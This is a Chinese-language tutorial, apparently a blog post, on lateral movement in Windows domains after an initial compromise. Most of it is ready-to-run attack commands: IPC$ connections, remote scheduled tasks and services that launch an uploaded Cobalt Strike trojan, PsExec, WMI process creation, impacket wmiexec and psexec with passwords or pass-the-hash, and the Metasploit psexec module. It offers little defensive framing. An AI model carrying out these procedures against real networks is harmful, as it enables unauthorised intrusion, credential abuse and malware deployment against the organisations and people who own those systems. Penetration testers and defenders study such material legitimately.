简介
横向移动,根据定义是指获取内网某台机器的控制权之后,以被攻陷主机为跳板,通过搜集域内凭证,找办法访问到域内其他机器,再依次循环往复,直到获得域控权限甚至控制内网。
IPC 计划任务横向
IPC共享命名管道的资源,是为了实现进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,使用139、445端口。建立向目标主机的IPC$连接,把命令执行的脚本传到目标主机,创建计划任务在目标机器上执行命令脚本。
1、目标主机开启了139和445端口; 2、目标主机开启了ipc$默认共享; 3、需要目标主机的可登录账户及密码。
建立ipc连接
net use \\目标主机ip\ipc$ "主机password" /user:"主机用户名"
查看已经建立的连接
net use
上传文件到目标主机
copy 本地文件路径 \\目标主机ip\c$
schtasks创建计划任务
windows-server2012之前的版本可以使用at命令创建计划任务,之后的版本at命令已经被淘汰,使用schtasks命令创建计划任务。
创建任务之前可以先查询一下目标主机的机器时间
net time \\目标主机ip
schtasks命令创建计划任务
schtasks /create /s 192.168.95.142 /u long\administrator /p Ling123 /sc minute /st 16:45 /tn test /tr c:\av.exe /ru system
/Create #创建计划任务
/S #远程主机
/U #用户名
/P #密码
/SC #任务运行频率
/ST #运行时间
/TN #任务名称
/TR #命令路径
/RU #运行权限
/MO #运行周期
查询计划任务
schtasks /query /s 192.168.95.142 /u long\administrator /p Ling123 | findstr "test"
删除计划任务
schtasks.exe /delete /s 192.168.95.142 /u long\administrator /p Ling123 /tn "test"
计划任务执行文件
我这里使用的是cs生成的木马文件上传设置执行,成功上线。
psexec.exe远程命令执行
下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
psexec.exe \\目标主机ip -u 用户名 -p 密码 powershell.exe
wmicmd.exe回显命令执行
下载地址:
WMIcmd.exe -h 192.168.95.154 -u administrator -p Ling123 -c "whoami" -d hostname
sc命令创建服务执行
sc \\目标主机ip create test binpath="cmd.exe /c c:\av.exe" #创建test服务
sc \\目标主机ip start test #启动test服务
sc \\目标主机ip del test #删除test服务
WMI命令横向
WMI全称是“windows管理规范”,从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理,但是在内网渗透中,可以使用WMI进行横向移动。
需要目标主机wmi服务及端口135开启(默认开启),需要防火墙允许135、445等端口通信并且需要知道目标主机的账户密码。
无需上传第三方软件,利用系统内置程序单命令执行,但是执行命令后无结果回显。
WMIC命令的process选项可以在目标主机的系统中创建进程,可以帮助创建后门。
wmic process call create “[Process Name]”
wmic /node:192.168.95.154 /user:administrator /password:Ling123 process call create "cmd.exe /c ipconfig>c:\test.txt"
impacket工具wmiexec
下载地址:
https://github.com/SecureAuthCorp/impacket
利用用户名及密码执行命令
cd impacket/examples
python3 wmiexec.py 用户名:'密码'@目标主机ip "whoami"
利用用户hash执行命令
首先需要想办法获取目标主机的登录hash
python .\wmiexec.py -hashes :密码hash 用户名@目标主机 "whoami"
SMB横向
利用SMB服务通过明文或hash传递来远程执行命令
需要目标主机开发445端口及账号密码或hash
使用impacket工具psexec.py
下载地址:
https://github.com/CoreSecurity/impacket
git clone https://github.com/CoreSecurity/impacket.git
cd impacket
python3 setup.py install
cd examples
python3 psexec.py
用户密码登录
python3 psexec.py 用户名:'密码'@目标主机ip "whoami"
hsah登录
python3 psexec.py -hashes :密码hash 用户名@目标主机ip "whoami"
使用msf的Psexec模块
use exploit/windows/smb/psexec
set RHOST 目标主机ip
set smbuser usernmae
set smbpass password
run
结语
已无暇顾及过去,要向前走。